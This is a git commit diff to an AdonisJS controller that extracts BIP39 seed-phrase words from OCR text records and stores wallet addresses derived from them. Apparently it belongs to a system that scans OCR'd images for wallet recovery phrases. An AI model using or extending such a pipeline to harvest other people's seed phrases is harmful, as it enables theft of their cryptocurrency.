Просмотр исходного кода

feat(ocr): 增加记录解析功能以识别潜在助记词

- 添加 recordParsing 方法对 OCR 记录进行解析
- 实现 findPossibleMnemonics 方法寻找可能的助记词序列
- 优化导入语句,移除未使用的 rules 模块
- 引入 bip39 模块以支持助记词相关操作
wui 9 месяцев назад
Родитель
Коммит
638536e631
1 изменённый файл: 100 добавлений и 2 удаления
  1. 100 2
      app/Controllers/Http/OcrRecordController.ts

+ 100 - 2
app/Controllers/Http/OcrRecordController.ts

@@ -1,10 +1,10 @@
 import { HttpContextContract } from '@ioc:Adonis/Core/HttpContext'
 import PaginationService from 'App/Services/PaginationService'
-import { rules, schema } from '@ioc:Adonis/Core/Validator'
+import { schema } from '@ioc:Adonis/Core/Validator'
 import OcrRecord from 'App/Models/OcrRecord'
 import Drive from '@ioc:Adonis/Core/Drive'
 import BlockchainWalletService from 'App/Services/BlockchainWalletService'
-import OcrDevice from 'App/Models/OcrDevice'
+import * as bip39 from 'bip39'
 
 export default class OcrRecordController {
     private paginationService = new PaginationService(OcrRecord)
@@ -56,6 +56,7 @@ export default class OcrRecordController {
         if (record) {
             const walletAddresses = await BlockchainWalletService.getAllAddresses(record.content)
             record.detail = JSON.stringify(walletAddresses)
+            record.content = await this.recordParsing(record.content)
             await record.save()
             return response.ok(record)
         } else {
@@ -71,4 +72,101 @@ export default class OcrRecordController {
         })
         return BlockchainWalletService.getAllAddresses(request.input('mnemonic'))
     }
+
+    /**
+     * Reduces raw OCR text to a space-separated string of BIP39 English words.
+     *
+     * Every run of ASCII letters in the text is lower-cased, de-duplicated
+     * (first occurrence wins) and kept only if it appears in
+     * `bip39.wordlists.english`. The lines are then handed to
+     * `findPossibleMnemonics`; its result is returned unless it holds fewer
+     * entries than the de-duplicated candidate list, in which case the
+     * candidate list is returned instead.
+     *
+     * @param record Raw OCR text, with lines separated by `\n`.
+     * @returns The selected words joined by single spaces (`''` when nothing matches).
+     */
+    public async recordParsing(record: string): Promise<string> {
+        const lines = record.split('\n')
+
+        // The pattern yields letters-only tokens, so no extra numeric or '.' filtering is needed.
+        const englishWordRegex = /[a-zA-Z]+/g
+        const candidates = new Set<string>()
+        for (const line of lines) {
+            const tokens = line.match(englishWordRegex)
+            if (!tokens) {
+                continue
+            }
+            for (const token of tokens) {
+                candidates.add(token.toLowerCase())
+            }
+        }
+
+        // Set lookup instead of scanning the whole word list for every candidate.
+        const wordlist = new Set(bip39.wordlists.english)
+        const potentialBip39Words = Array.from(candidates).filter((word) => wordlist.has(word))
+
+        // Per-line search for runs of BIP39 words.
+        const possibleMnemonics = await this.findPossibleMnemonics(lines, potentialBip39Words)
+
+        // Log counts only: the words themselves may form a wallet seed phrase
+        // and must not end up in plaintext logs.
+        console.log('Potential BIP39 words:', potentialBip39Words.length)
+        console.log('Potential mnemonics:', possibleMnemonics.length)
+
+        // Fall back to the full candidate list when the per-line search found fewer words.
+        if (possibleMnemonics.length < potentialBip39Words.length) {
+            return potentialBip39Words.join(' ')
+        }
+        return possibleMnemonics.join(' ')
+    }
+
+    /**
+     * Collects BIP39 words from every line that contains at least three of them.
+     *
+     * Each line is split on whitespace; every token has the characters
+     * `.,;:!?` and the digits 0-9 removed and is lower-cased before being
+     * looked up in `bip39Words`. Matching words are appended in reading order.
+     * Duplicates are kept, and no 12/24-word checksum validation is performed.
+     *
+     * @param recTexts OCR text lines to scan.
+     * @param bip39Words Lower-case vocabulary of accepted words.
+     * @returns The cleaned matching words from all qualifying lines, in order.
+     */
+    private async findPossibleMnemonics(
+        recTexts: string[],
+        bip39Words: string[]
+    ): Promise<string[]> {
+        // A line needs at least this many vocabulary words to be treated as part of a phrase.
+        const minWordsPerLine = 3
+        const vocabulary = new Set(bip39Words)
+        const mnemonics: string[] = []
+
+        for (const text of recTexts) {
+            // Keep the cleaned form of each token so punctuation and digits
+            // (e.g. "1.abandon,") never leak into the returned words.
+            const wordsInLine = text
+                .split(/\s+/)
+                .map((token) => token.replace(/[.,;:!?0-9]/g, '').toLowerCase())
+                .filter((word) => vocabulary.has(word))
+
+            if (wordsInLine.length >= minWordsPerLine) {
+                mnemonics.push(...wordsInLine)
+            }
+        }
+
+        return mnemonics
+    }
 }